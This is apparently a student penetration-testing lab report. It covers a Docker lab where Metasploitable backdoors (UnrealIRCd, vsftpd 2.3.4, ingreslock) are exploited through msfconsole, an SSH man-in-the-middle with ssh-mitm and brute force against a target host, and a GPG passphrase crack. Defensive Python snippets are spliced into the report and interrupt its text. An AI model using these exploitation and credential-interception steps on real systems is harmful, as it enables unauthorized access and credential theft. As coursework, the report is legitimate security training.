:::success
# OT Lab 2 - Software Testing
Individual assignment with group work parts. Initial task distribution: **st number is odd (st7) -> Choice 2**
:::

# Choice 2 - Software Vulnerabilities (high-level exploitations)

## Task 1 - Setup infrastructure for penetration testing

:::info
Set up a minimal network architecture containing at least:
* An attacker host (could be your host OS in the goal to save compute resources)
* A vulnerable node (ideally with an RCE)
* A node that is not vulnerable (kingdom) but that we need to get credentials for (and it's the network link that is vulnerable) or implement any other techniques to steal sensitive data/get unauthorized access
* An isolated network for kingdom or in the DMZ (choose your favorite routing solution)
:::

Okay, since most of the people I know who took the second choice decided to do this lab on Docker, I also use Docker, to have fewer problems with the overall configuration of this network.

* **tleemcjr/metasploitable2** - the simplest and most vulnerable Docker image
* [simplest guide](https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/)

```
# docker-compose.yml
version: '3'
services:
  vulnerable_node:
    image: tleemcjr/metasploitable2
    container_name: vulnerable
    command: bash -c "./bin/services.sh && while true; do sleep 2; done"
    networks:
      - test-network
      - internal-network
  # a second, clean vulnerable host for some manipulation with ssh-mitm
  vulnerable_node2:
    image: ubuntu
    container_name: vulnerable2
    command: bash -c "while true; do sleep 2; done"
    networks:
      - test-network
      - internal-network
  kingdom:
    image: ubuntu
    container_name: kingdom
    command: bash -c "while true; do sleep 2; done"
    networks:
      - test-network
  attacker_host:
    build:
      context: .
      dockerfile: DockerFileAttacker
    container_name: attacker
    command: bash -c "while true; do sleep 2; done"
    networks:
      - internal-network

# Docker networks: the attacker sits only on internal-network, kingdom only on test-network
networks:
  test-network:
    driver: bridge
  internal-network:
    driver: bridge
```

```
# DockerFileAttacker
FROM ubuntu
RUN mkdir /test
WORKDIR /test
RUN apt update && apt install -y python3 nmap curl net-tools nfs-common git systemctl nano
```

## Task 2 - Make an exploitation

:::info
Try and validate your chosen software vulnerability to attack a vulnerable node. Example of old good ones working RCE vulnerabilities (you are free to find others and may be newer):
* CVE-2015-1635 (IIS)
* CVE-2017-0144 - EternalBlue
* CVE-2018-1000861 (Jenkins)
* CVE-2019-0708 - Bluekeep
* CVE-2020-7247 (OpenSMTPD)

Explore the environment and networks as much as possible with the given access to vulnerable node. To make a PoC, one vulnerability is enough, but you are free to implement more.
:::

<center>

![](https://i.imgur.com/JHA4Ura.png)

Figure 1 - nmap scan

</center>

At first, the NFS vulnerability seemed the most interesting to me, and I spent a lot of time on it. However, in the case of Docker the problem is somewhere behind the containers, and I could not solve it even by rebuilding the network from scratch, adding an NFS volume, or playing with the portmapper services (rpcbind.socket, allowing UDP connections, failed to start). As you can see above, nmap did not find any open TCP ports for NFS in the scan.

[CVE-2010-2075](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2075)

In this case, I will try to take advantage of the UnrealIRCd 3.2.8.1 vulnerability. It is quite old, but I liked using msfconsole.
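Before moving on to the exploit itself, a sanity check on the lab topology from Task 1, added here as an example and not part of the original report: it reads each service's network membership from the compose file and computes the shortest pivot chain from the attacker to kingdom, which is the same picture the nmap runs from the compromised node give. The reader handles only the 2-space-indented subset shown; PyYAML would do the job on a full file.

```python
# Added example, not from the lab report: a check of the Task 1 compose topology.
# Containers talk directly only when they share a bridge network, so the attacker
# (internal-network only) should reach kingdom solely through a vulnerable node.
from collections import deque
# Constructed input: each service's networks, condensed from the compose file above.
COMPOSE = """\
services:
  vulnerable_node:
    networks:
      - test-network
      - internal-network
  vulnerable_node2:
    networks:
      - test-network
      - internal-network
  kingdom:
    networks:
      - test-network
  attacker_host:
    networks:
      - internal-network
"""
def parse_service_networks(text):
    """Subset reader for 2-space-indented compose files: {service: [networks]}."""
    out, service, in_services, in_list = {}, None, False, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        indent = len(raw) - len(raw.lstrip())
        if indent == 0:
            in_services = line == "services:"
        elif in_services and indent == 2:
            service, in_list = line.rstrip(":"), False
            out[service] = []
        elif in_services and indent == 4:
            in_list = line == "networks:"
        elif in_services and indent == 6 and in_list and line.startswith("- "):
            out[service].append(line[2:])
    return out
def neighbours(services, name):
    """Services sharing at least one network with `name`, sorted for determinism."""
    return sorted(s for s in services if s != name and set(services[s]) & set(services[name]))

def pivot_path(services, src, dst):
    """Shortest host chain from src to dst (BFS), or None if dst is unreachable."""
    queue, seen = deque([[src]]), {src}
    while queue:
        path = queue.popleft()
        if path[-1] == dst:
            return path
        for nxt in neighbours(services, path[-1]):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [nxt])
    return None
```

If `kingdom` ever shows up in `neighbours(topo, "attacker_host")`, the isolation requirement of Task 1 is not met.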
Some versions of Unreal3.2.8.1.tar.gz on the official mirrors contained a backdoor that allows executing arbitrary commands with the privileges of the user the ircd runs as.

```
# msfconsole
# use the "search" command to find module names, then apply them
msf6 > use unix/irc/unreal_ircd_3281_backdoor
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set TARGET vulnerable
TARGET => vulnerable
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOST vulnerable
RHOST => vulnerable
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload 2
payload => cmd/unix/bind_ruby
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set target 0
target => 0
```

<center>

![](https://i.imgur.com/nhmDc1p.png)

Figure 2 - Access inside the shell

![](https://i.imgur.com/7E9UzEX.png)

Figure 3 - nmap scan of kingdom from the obtained shell

</center>

## Task 3 - Attack a non-vulnerable node (kingdom)

:::info
Next, you are ready to proceed to get access on the internal network of the kingdom. To implement the attack, try to explore with which hacking tools you are able to implement this (may be something about SSH MITM?). Kingdom-PC can be connected to any different from vulnerable node subnet, it doesn't matter. To make a PoC with one working hacking tool/technique is enough.
:::

I chose the MITM attack because it was hinted at in the assignment. But I also think a brute force attack is applicable here; I'll show it a little later, but I won't describe it.

```
# on vulnerable2
apt-get install python3-pip
pip install ssh-mitm
ssh-mitm server --remote-host kingdom
```

I am using a new (clean) image for the vulnerable server because the Metasploitable one behaves too aggressively towards some services and commands.
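Before wiring up sshd on kingdom, the client-side check that catches this kind of proxy, as an added example rather than the lab's own code: ssh-mitm can only present its own host key, so a client that has kingdom's key pinned in `known_hosts` sees a mismatch instead of a transparent session. All keys below are constructed dummies; hashed `known_hosts` entries and `[host]:port` forms are not handled.

```python
# Added example, not from the lab report: the client-side check that exposes an
# SSH proxy such as ssh-mitm. The proxy on vulnerable2 can only present its own
# host key, so a client that has kingdom's key pinned in known_hosts gets a
# mismatch instead of a transparent session. All keys here are constructed dummies.
import base64
import hashlib
import struct

def ssh_string(data):
    """SSH wire-format string: 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data

def ed25519_hostkey_blob(raw32):
    """Public key blob as it appears (base64) in known_hosts for ssh-ed25519."""
    return ssh_string(b"ssh-ed25519") + ssh_string(raw32)

def fingerprint(blob):
    """SHA256 fingerprint in the form ssh-keygen -lf prints (unpadded base64)."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

def parse_known_hosts(text):
    """{(host, keytype): blob} from plain known_hosts lines (hashed entries and
    [host]:port forms are not handled here)."""
    pins = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0].startswith("#"):
            continue
        for host in parts[0].split(","):
            pins[(host, parts[1])] = base64.b64decode(parts[2])
    return pins

def check_host_key(pins, host, keytype, presented):
    """'ok' if the presented key matches the pin, 'mismatch' if it differs, and
    'unknown' when nothing is pinned (first contact, where a proxy goes unnoticed)."""
    expected = pins.get((host, keytype))
    if expected is None:
        return "unknown"
    return "ok" if expected == presented else "mismatch"

# Constructed keys: kingdom's real host key and the key the proxy presents instead.
KINGDOM_KEY = ed25519_hostkey_blob(bytes(range(32)))
PROXY_KEY = ed25519_hostkey_blob(bytes(range(32, 64)))
KNOWN_HOSTS = "kingdom ssh-ed25519 " + base64.b64encode(KINGDOM_KEY).decode() + "\n"
```

The "unknown" case is the one the proxy relies on: a user who has never connected to kingdom before has nothing to compare against and simply accepts the proxy's fingerprint.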
```
# on kingdom, to open the SSH port
apt-get install openssh-server
systemctl enable ssh
systemctl start ssh
adduser user        # create the password and the other details
addgroup user ssh
```

<center>

![](https://i.imgur.com/pk7xSYy.png)

Figure 4 - SSH-MITM implementation

</center>

Now it is enough for the attacker to connect to the listening port 10022.

<center>

![](https://i.imgur.com/pvvKmz8.png)

Figure 5 - The result

</center>

This is also one of the options: we can get access to the vulnerable host and, through it, to the kingdom by brute force, although it is not very elegant.

<center>

![](https://i.imgur.com/pdQM3VA.png)

Figure 5 - SSH brute force

</center>

## Task 4 - Privilege escalation flow (in group by two)

:::info
In this task you should choose a partner who has the same lab choice.
1. Choose a privilege escalation scenario and set up a vulnerable node. You can use a vulnerable node from previous tasks. If your previously chosen vulnerability can provide you a privilege escalation attack, just use it. Otherwise, define another vulnerability and make it from scratch.
2. Understand the process of the chosen vulnerability and describe how it works.
3. Test and validate it. If you do something with privilege escalation in Task 3, just extend the explanations here.
4. Deliver your vulnerable instance for your partner to attack.
:::

One of the simple examples is `.rhosts` containing `+ +`, which allows a connection from any node on the same network as the vulnerable node. The $HOME/.rhosts file defines which remote hosts (computers on a network) can invoke certain commands on the local host without supplying a password. This file is a hidden file in the local user's home directory and must be owned by the local user. A + (plus sign) signifies that any host on the network is trusted.
<center>

![](https://i.imgur.com/lZtuIlX.png)

Figure 6 - .rhosts + +

</center>

The ingreslock port (1524/TCP) is often used as a backdoor by programs that exploit vulnerable RPC (Remote Procedure Call) services. The port belongs to a service called ingreslock, which is meant to lock down specific areas of the database application. Inadvertently, ingreslock has a backdoor associated with it that is bound automatically when a connection is made to this port.

<center>

![](https://i.imgur.com/mMtSfhF.png)

Figure 7 - ingreslock backdoor

</center>

In all these cases, I get root rights.

:::info
5.1. After you received the partner's vulnerable node image, find out what kind of vulnerability you were proposed by your opponent teammate. It is not necessary to do a black box exploration (surely you are already exhausted by this time), so just agree with your partner about the name of the vulnerability or about other tips.
5.2. Understand the process and describe how it works.
5.3. Hack it.
:::

Ivan and I used the same image for the vulnerable host, but he wrote a script for his vulnerability. I'll try to hack it through msfconsole. This is one of the varieties of backdoor ([CVE-2011-2523](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523)).

> This vulnerability is a backdoor detected in the service vsftpd version 2.3.4. If a user name ending with the sequence :) is sent to the service, the backdoor version will open a listening shell on port 6200, which will be able to execute commands under the root user
>
> from Ivan's report

<center>

![](https://i.imgur.com/dCrZxb1.png)

Figure 8 - Needed module

</center>

```
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST vulnerable
RHOST => vulnerable
```

<center>

![](https://i.imgur.com/PMt3duB.png)

Figure 8 - Result

</center>

I understand that msfconsole is a fairly simple and primitive way.
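The trigger in Ivan's quote, seen from the defender's side: an added detector (not part of either report) that applies the same byte test the infected server uses to the USER commands in captured FTP control-channel traffic and correlates a hit with a later connection to port 6200. The event list is constructed for the demo.

```python
# Added example, not from the lab report: a detector for the vsftpd 2.3.4
# backdoor trigger. It reproduces the infected server's own test (a 0x3A byte
# directly followed by 0x29, i.e. ":)", anywhere in the USER argument) over FTP
# control-channel lines and then looks for a follow-up session to port 6200.
# The events below are constructed for the demo, not taken from the lab.

def has_smiley(p_buf):
    """Mirror of the backdoor's scan over the login string."""
    for i in range(len(p_buf) - 1):
        if p_buf[i] == 0x3A and p_buf[i + 1] == 0x29:
            return True
    return False

def detect_backdoor(events):
    """events: (src_ip, dst_port, payload) tuples from FTP control traffic and
    TCP connection attempts. Returns (src_ip, reason) alerts in capture order."""
    alerts, triggered = [], set()
    for src, dport, payload in events:
        if dport == 21 and payload.upper().startswith(b"USER "):
            user = payload[5:].rstrip(b"\r\n")
            if has_smiley(user):
                triggered.add(src)
                alerts.append((src, "USER with :) trigger: %r" % user))
        elif dport == 6200 and src in triggered:
            # only correlated with a prior trigger; a bare 6200 probe is not enough
            alerts.append((src, "connection to backdoor port 6200 after trigger"))
    return alerts

# Constructed sample: a normal login, the trigger, and the follow-up connection.
SAMPLE_EVENTS = [
    ("10.0.0.5", 21, b"USER anonymous\r\n"),
    ("10.0.0.5", 21, b"PASS guest@\r\n"),
    ("10.0.0.9", 21, b"USER ivan:)\r\n"),
    ("10.0.0.9", 21, b"PASS whatever\r\n"),
    ("10.0.0.9", 6200, b""),
    ("10.0.0.5", 6200, b""),   # no trigger seen from this host: not alerted
]
```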
But if we talk about replaying it by hand, it looks like this:

<center>

![](https://i.imgur.com/iEja0U4.png)

Figure 8 - Telnet test

</center>

As the login I give a username ending with a smiley face, and this opens a backdoor on port 6200. I was not able to show the correct output via telnet (it seems to me that this is again a Docker peculiarity), but it would look like this:

```
id
uid=0(root) gid=0(root)
```

This is because two hexadecimal values are compared against the array p_buf[i]: 0x3A and 0x29 are the ASCII codes for ":" and ")" respectively, the "smiley". The code snippet iterates through the array and checks the string entered by the user when logging in to the FTP server. If it finds the "smiley" characters in the correct order, it runs the vsf_sysutil_extra() function.

<center>

![](https://i.imgur.com/hvrAH8b.png)

Figure 9 - [From source code](https://github.com/nikdubois/vsftpd-2.3.4-infected/blob/vsftpd_original/infection.diff)

</center>

The vsf_sysutil_extra() function sets up a TCP socket listening on port 6200, which launches a shell when a connection is made to that port.

<center>

![](https://i.imgur.com/oiS3ZTp.png)

Figure 10 - vsf_sysutil_extra()

</center>

## Task 5 - Magic video

:::info
Let's make some fun at the end. You are given the file. Find out what kind of file it is and retrieve the message.
:::

At first glance, it looks like an old Elvis Presley music video. However, if we simply open the .avi file in a text editor, then below all the video data we find two fragments of base64-encoded text.
:::spoiler
(the two base64 fragments carved from the .avi, several kilobytes in total, are omitted here)
:::

Initially, it looked like two
messages or a key and some kind of message. I tried to recode the base64 to hex and then pick a hash algorithm for it. But in the end I came to the conclusion that, judging by the amount of data (more than four thousand bytes), it looks more like keys. Therefore, I first wrapped the first part of the cipher text as a GPG message and, with the help of the gpg2john utility, got a hash.

```
# version10.asc
-----BEGIN PGP MESSAGE-----
Version: GnuPG v1

<long bla-bla-bla from xxx.avi>
-----END PGP MESSAGE-----
```

<center>

![](https://i.imgur.com/eAxKRNU.png)

![](https://i.imgur.com/XkNkOIo.png)

Figure 11, 12 - GPG/PGP key

</center>

I saved the result to a "hash" file and gave it to John.

<center>

![](https://i.imgur.com/qz1kchr.png)

Figure 13 - passphrase

</center>

Now we can find the private key and decrypt the message.

<center>

![](https://i.imgur.com/5aP4twG.png)

Figure 14 - import private key and decrypt message

</center>

### **The answer is: elvissiguevivo**

<center>

![](https://i.imgur.com/TmkHrFB.png)

Figure 15 - message file and its header

</center>

<center>

![](https://i.imgur.com/V0MKk1w.png)

Figure 16 - key file and its header

</center>

## References:
1. [IBM: rhosts file](https://www.ibm.com/docs/en/aix/7.2?topic=formats-rhosts-file-format-tcpip)
2. [Metasploit unleashed: msfconsole commands](https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/)
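Returning to the two fragments of Task 5: the guess between "two messages" and "a key and a message" can be settled without John by reading the OpenPGP packet header of each fragment, which this added example (not part of the report) does on a constructed file. Applied to the first bytes of the real fragments it yields tag 5 (Secret-Key) for the first and tag 1 (Public-Key Encrypted Session Key) for the second, the key-then-message split reached above; the header parser covers any old- or new-format packet, not only those two.

```python
# Added example, not from the lab report: the triage the text describes, done
# programmatically. It carves long base64 runs out of a binary file and reads
# the OpenPGP packet header (RFC 4880) of each run, which is what separates a
# secret-key block from an encrypted message. The container bytes and packet
# bodies below are constructed dummies, not the lab's .avi or its fragments.
import base64
import re

TAG_NAMES = {1: "Public-Key Encrypted Session Key", 2: "Signature",
             5: "Secret-Key", 6: "Public-Key", 8: "Compressed Data",
             9: "Symmetrically Encrypted Data", 11: "Literal Data",
             18: "Sym. Encrypted and Integrity Protected Data"}

def old_format_packet(tag, body):
    """Old-format packet header with a 2-byte length (length type 1) + body."""
    return bytes([0x80 | (tag << 2) | 1]) + len(body).to_bytes(2, "big") + body

def packet_tag(data):
    """(tag, new_format) from the first header byte, or None if it is not PGP."""
    if not data or not data[0] & 0x80:
        return None
    if data[0] & 0x40:                    # new format: tag in the low 6 bits
        return data[0] & 0x3F, True
    return (data[0] >> 2) & 0x0F, False   # old format: tag in bits 2..5

def carve_base64(blob, min_len=40):
    """Decode every long base64 run (line breaks allowed); skip invalid ones."""
    out = []
    for run in re.findall(rb"[A-Za-z0-9+/\r\n]{%d,}=*" % min_len, blob):
        try:
            out.append(base64.b64decode(re.sub(rb"\s", b"", run), validate=True))
        except ValueError:               # not base64 after all (binascii.Error)
            pass
    return out

def classify(blob):
    """[(tag, name)] for each carved run whose first byte is a packet header."""
    found = []
    for data in carve_base64(blob):
        hdr = packet_tag(data)
        if hdr:
            found.append((hdr[0], TAG_NAMES.get(hdr[0], "tag %d" % hdr[0])))
    return found

# Constructed container: AVI-like junk with two packets appended, as in Task 5.
KEY_PKT = old_format_packet(5, b"\x04" + bytes(40))   # dummy secret-key packet
MSG_PKT = old_format_packet(1, b"\x03" + bytes(40))   # dummy session-key packet
FAKE_AVI = (b"RIFF\x00\x10\x00\x00AVI LIST" + bytes(range(256)) +
            base64.encodebytes(KEY_PKT) + b"\n---\n" + base64.encodebytes(MSG_PKT))
```

On a real file, `gpg --list-packets` on each carved fragment gives the same tag information in more detail.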